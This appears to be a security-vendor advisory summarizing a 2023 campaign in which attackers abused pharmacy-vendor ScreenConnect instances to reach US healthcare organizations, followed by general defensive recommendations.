Overview
A targeted cyber-attack involving the abuse of the ScreenConnect remote access tool has been identified, impacting multiple healthcare organizations in the U.S. Notably, the threat actors exploited local ScreenConnect instances affiliated with Transaction Data Systems (TDS), a comprehensive pharmacy supply chain and management systems provider. The attacks were detected between October 28 and November 8, 2023, with ongoing activity raising concerns. The assailants, identified by Huntress, a managed security research organization, demonstrated advanced tactics, installing additional tools like AnyDesk to maintain persistent access.
The attackers first downloaded a payload named text.xml, indicative of a unified modus operandi. This payload, laden with C# code, discreetly loaded the Metasploit attack payload Meterpreter into system memory, evading detection using non-PowerShell techniques. Further, processes were launched through the Printer Spooler service, with compromised endpoints operating on Windows Server 2019.
The common thread among the affected organizations was the presence of a ScreenConnect instance tied to the 'rs.tdsclinical[.]com' domain associated with TDS. The remote access tool facilitated the installation of additional payloads, command execution, file transfers, and attempted creation of new user accounts for sustained access.
Response and Recovery
Huntress observed the installation of additional tools and attempts to create user accounts. TDS, now 'Outcomes,' after a recent merger, has been notified but has not responded. Clarity on the effectiveness of TDS's incident response plan is pending, as they’ve made no effort to contact the Huntress research team regarding this incident. It is unknown if stakeholders have been informed about this incident, which may cause reputational damage and compromise the trust of customers.
Recommendations
There is an ever-present need for the Healthcare industry to be proactive about cybersecurity measures, collaborative threat intelligence sharing, and swift incident response. Healthcare and pharmaceutical executives must prioritize a comprehensive review of their organization's security posture to prevent future incidents of a similar nature.
Specifically, immediate actions to enhance the security of ScreenConnect instances must be taken. Scrutinizing and securing remote access tools, conducting thorough reviews of security protocols and incident response plans, enhancing employee training to recognize and report potential security threats, and utilizing a team of experts that proactively hunt for threats within an organization’s systems.
.webp)
.png)
